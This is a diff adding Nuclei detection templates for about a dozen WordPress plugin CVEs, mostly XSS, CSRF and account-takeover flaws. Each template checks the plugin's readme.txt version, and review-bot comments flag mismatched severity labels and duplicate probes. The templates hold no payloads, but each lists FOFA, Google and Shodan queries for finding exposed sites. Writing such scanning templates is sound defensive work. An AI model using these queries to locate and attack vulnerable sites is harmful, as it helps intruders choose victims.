+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml b/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml
new file mode 100644
index 0000000000..2b7c04d01d
--- /dev/null
+++ b/poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2
+
+info:
+ name: >
+ Suki Sites Import <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Suki Sites Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6dd146-a99e-4317-a703-de34735317c8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8916
+ metadata:
+ fofa-query: "wp-content/plugins/suki-sites-import/"
+ google-query: inurl:"/wp-content/plugins/suki-sites-import/"
+ shodan-query: 'vuln:CVE-2024-8916'
+ tags: cve,wordpress,wp-plugin,suki-sites-import,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/suki-sites-import/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "suki-sites-import"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8920.yaml b/poc/cve/CVE-2024-8920.yaml
new file mode 100644
index 0000000000..a952ea58b0
--- /dev/null
+++ b/poc/cve/CVE-2024-8920.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8920
+
+info:
+ name: >
+ Fonto – Custom Web Fonts Manager <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Fonto – Custom Web Fonts Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8920
+ metadata:
+ fofa-query: "wp-content/plugins/fonto/"
+ google-query: inurl:"/wp-content/plugins/fonto/"
+ shodan-query: 'vuln:CVE-2024-8920'
+ tags: cve,wordpress,wp-plugin,fonto,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fonto/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fonto"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9184.yaml b/poc/cve/CVE-2024-9184.yaml
new file mode 100644
index 0000000000..c4e23a6efd
--- /dev/null
+++ b/poc/cve/CVE-2024-9184.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9184
+
+info:
+ name: >
+ SendPulse Free Web Push <= 1.3.6 - Unauthenticated Stored Cross-Site Scripting
+ author: topscoder
+ severity: high
+ description: >
+ The SendPulse Free Web Push plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.6 due to incorrect use of the wp_kses_allowed_html function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/74831bf8-0a30-4758-bfe6-5a5b4ee7ec24?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-9184
+ metadata:
+ fofa-query: "wp-content/plugins/sendpulse-web-push/"
+ google-query: inurl:"/wp-content/plugins/sendpulse-web-push/"
+ shodan-query: 'vuln:CVE-2024-9184'
+ tags: cve,wordpress,wp-plugin,sendpulse-web-push,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sendpulse-web-push/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sendpulse-web-push"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml b/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml
new file mode 100644
index 0000000000..7a12de9eb8
--- /dev/null
+++ b/poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff
+
+info:
+ name: >
+ MAS Companies For WP Job Manager <= 1.0.13 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The MAS Companies For WP Job Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9206
+ metadata:
+ fofa-query: "wp-content/plugins/mas-wp-job-manager-company/"
+ google-query: inurl:"/wp-content/plugins/mas-wp-job-manager-company/"
+ shodan-query: 'vuln:CVE-2024-9206'
+ tags: cve,wordpress,wp-plugin,mas-wp-job-manager-company,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mas-wp-job-manager-company/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mas-wp-job-manager-company"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.13')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9213.yaml b/poc/cve/CVE-2024-9213.yaml
new file mode 100644
index 0000000000..a5af341012
--- /dev/null
+++ b/poc/cve/CVE-2024-9213.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9213
+
+info:
+ name: >
+ Persian WooCommerce SMS <= 7.0.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The افزونه پیامک ووکامرس Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8845d56-2e8a-472a-bc32-e26b388ce58d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9213
+ metadata:
+ fofa-query: "wp-content/plugins/persian-woocommerce-sms/"
+ google-query: inurl:"/wp-content/plugins/persian-woocommerce-sms/"
+ shodan-query: 'vuln:CVE-2024-9213'
+ tags: cve,wordpress,wp-plugin,persian-woocommerce-sms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/persian-woocommerce-sms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "persian-woocommerce-sms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9215.yaml b/poc/cve/CVE-2024-9215.yaml
new file mode 100644
index 0000000000..d0769e17da
--- /dev/null
+++ b/poc/cve/CVE-2024-9215.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9215
+
+info:
+ name: >
+ Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors <= 4.7.1 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary User Email Update and Account Takeover
+ author: topscoder
+ severity: low
+ description: >
+ The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to Insecure Direct Object Reference to Privilege Escalation/Account Takeover in all versions up to, and including, 4.7.1 via the action_edited_author() due to missing validation on the 'authors-user_id' user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update arbitrary user accounts email addresses, including administrators, which can then be leveraged to reset that user's account password and gain access.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0506137-82e3-4988-9b23-370465a866c0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-9215
+ metadata:
+ fofa-query: "wp-content/plugins/publishpress-authors/"
+ google-query: inurl:"/wp-content/plugins/publishpress-authors/"
+ shodan-query: 'vuln:CVE-2024-9215'
+ tags: cve,wordpress,wp-plugin,publishpress-authors,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/publishpress-authors/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "publishpress-authors"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.7.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9240.yaml b/poc/cve/CVE-2024-9240.yaml
new file mode 100644
index 0000000000..f5dfb3a62a
--- /dev/null
+++ b/poc/cve/CVE-2024-9240.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9240
+
+info:
+ name: >
+ ReDi Restaurant Reservation <= 24.0902 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ReDi Restaurant Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 24.0902. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9240
+ metadata:
+ fofa-query: "wp-content/plugins/redi-restaurant-reservation/"
+ google-query: inurl:"/wp-content/plugins/redi-restaurant-reservation/"
+ shodan-query: 'vuln:CVE-2024-9240'
+ tags: cve,wordpress,wp-plugin,redi-restaurant-reservation,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/redi-restaurant-reservation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "redi-restaurant-reservation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 24.0902')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9263.yaml b/poc/cve/CVE-2024-9263.yaml
new file mode 100644
index 0000000000..667321ffa3
--- /dev/null
+++ b/poc/cve/CVE-2024-9263.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9263
+
+info:
+ name: >
+ WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin <= 1.0.25 - Insecure Direct Object Reference to Unauthenticated Arbitrary User Password/Email Reset/Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+ The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to Account Takeover/Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 1.0.25 via the save() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to reset the emails and passwords of arbitrary user accounts, including administrators, which makes account takeover and privilege escalation possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-9263
+ metadata:
+ fofa-query: "wp-content/plugins/timetics/"
+ google-query: inurl:"/wp-content/plugins/timetics/"
+ shodan-query: 'vuln:CVE-2024-9263'
+ tags: cve,wordpress,wp-plugin,timetics,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/timetics/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "timetics"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.25')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9347.yaml b/poc/cve/CVE-2024-9347.yaml
new file mode 100644
index 0000000000..8ef03bfb38
--- /dev/null
+++ b/poc/cve/CVE-2024-9347.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9347
+
+info:
+ name: >
+ The Ultimate WordPress Toolkit – WP Extended <= 3.0.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpext-export' parameter in all versions up to, and including, 3.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9347
+ metadata:
+ fofa-query: "wp-content/plugins/wpextended/"
+ google-query: inurl:"/wp-content/plugins/wpextended/"
+ shodan-query: 'vuln:CVE-2024-9347'
+ tags: cve,wordpress,wp-plugin,wpextended,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpextended/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpextended"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml b/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml
new file mode 100644
index 0000000000..9a255ce053
--- /dev/null
+++ b/poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9350-46f7941cec982659947867d1e8ef96f4
+
+info:
+ name: >
+ DPD Baltic Shipping <= 1.2.83 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The DPD Baltic Shipping plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_value' parameter in all versions up to, and including, 1.2.83 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9350
+ metadata:
+ fofa-query: "wp-content/plugins/woo-shipping-dpd-baltic/"
+ google-query: inurl:"/wp-content/plugins/woo-shipping-dpd-baltic/"
+ shodan-query: 'vuln:CVE-2024-9350'
+ tags: cve,wordpress,wp-plugin,woo-shipping-dpd-baltic,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-shipping-dpd-baltic/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-shipping-dpd-baltic"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.83')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9351.yaml b/poc/cve/CVE-2024-9351.yaml
new file mode 100644
index 0000000000..f4cf270125
--- /dev/null
+++ b/poc/cve/CVE-2024-9351.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9351
+
+info:
+ name: >
+ Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.35.1 - Cross-Site Request Forgery to Draft Quiz Creation
+ author: topscoder
+ severity: medium
+ description: >
+ The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the quiz 'create_module' function. This makes it possible for unauthenticated attackers to create draft quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9351
+ metadata:
+ fofa-query: "wp-content/plugins/forminator/"
+ google-query: inurl:"/wp-content/plugins/forminator/"
+ shodan-query: 'vuln:CVE-2024-9351'
+ tags: cve,wordpress,wp-plugin,forminator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forminator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.35.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9352.yaml b/poc/cve/CVE-2024-9352.yaml
new file mode 100644
index 0000000000..4501aa5899
--- /dev/null
+++ b/poc/cve/CVE-2024-9352.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9352
+
+info:
+ name: >
+ Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.35.1 - Cross-Site Request Forgery to Draft Custom Form Creation
+ author: topscoder
+ severity: medium
+ description: >
+ The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the custom form 'create_module' function. This makes it possible for unauthenticated attackers to create draft forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9352
+ metadata:
+ fofa-query: "wp-content/plugins/forminator/"
+ google-query: inurl:"/wp-content/plugins/forminator/"
+ shodan-query: 'vuln:CVE-2024-9352'
+ tags: cve,wordpress,wp-plugin,forminator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forminator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.35.1')
\ No newline at end of file
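Review bot: The `http:` block here is the same as in CVE-2024-9351.yaml (same readme.txt path, same `forminator` word matcher, same `compare_versions(version, '<= 1.35.1')`), so the two templates always fire together and the result cannot say which of the two CSRF issues is present. Since neither request touches the 'create_module' handler, I would note that in the file, e.g. `# Same version probe as CVE-2024-9351; a match indicates the affected release range, not this specific issue.` CVE-2024-9861.yaml and CVE-2024-9862.yaml are a second pair with identical probes.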
diff --git a/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml b/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml
new file mode 100644
index 0000000000..c324f69754
--- /dev/null
+++ b/poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9361-ae08a2363aeae9e478390a36b3137512
+
+info:
+ name: >
+ Bulk images optimizer: Resize, optimize, convert to webp, rename ... <= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update
+ author: topscoder
+ severity: low
+ description: >
+ The Bulk images optimizer: Resize, optimize, convert to webp, rename … plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_configuration' function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9361
+ metadata:
+ fofa-query: "wp-content/plugins/bulk-image-resizer/"
+ google-query: inurl:"/wp-content/plugins/bulk-image-resizer/"
+ shodan-query: 'vuln:CVE-2024-9361'
+ tags: cve,wordpress,wp-plugin,bulk-image-resizer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bulk-image-resizer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bulk-image-resizer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml b/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml
new file mode 100644
index 0000000000..c859ab6ffe
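Review bot: `severity: low` (and the `low` tag) does not match `cvss-score: 4.3`, which is Medium on the CVSS v3.1 rating scale, so a scan or report filtered by severity will under-rank this finding; `severity: medium` with the tag changed to match would agree with the score. The label looks tied to the attack needing an authenticated user rather than to the score, though that is inferred from the pattern, and it recurs in CVE-2024-9364 (4.3) and in CVE-2024-9366, 9373, 9425, 9452, 9674, 9703 and 9848 (all 6.4). The case that matters most is CVE-2024-9575.yaml, where 8.8 (High) is labelled `low`. CVE-2024-9861.yaml goes the other way, `critical` against 8.1 (High).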
--- /dev/null
+++ b/poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9364-247afd95e97573e50cc26fa4abafe629
+
+info:
+ name: >
+ SendGrid for WordPress <= 1.4 - Missing Authorization to Authenticated (Subscriber+) Log Deletion
+ author: topscoder
+ severity: low
+ description: >
+ The SendGrid for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_mailplus_clear_logs' function in all versions up to, and including, 1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's log files.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9364
+ metadata:
+ fofa-query: "wp-content/plugins/wp-sendgrid-mailer/"
+ google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/"
+ shodan-query: 'vuln:CVE-2024-9364'
+ tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
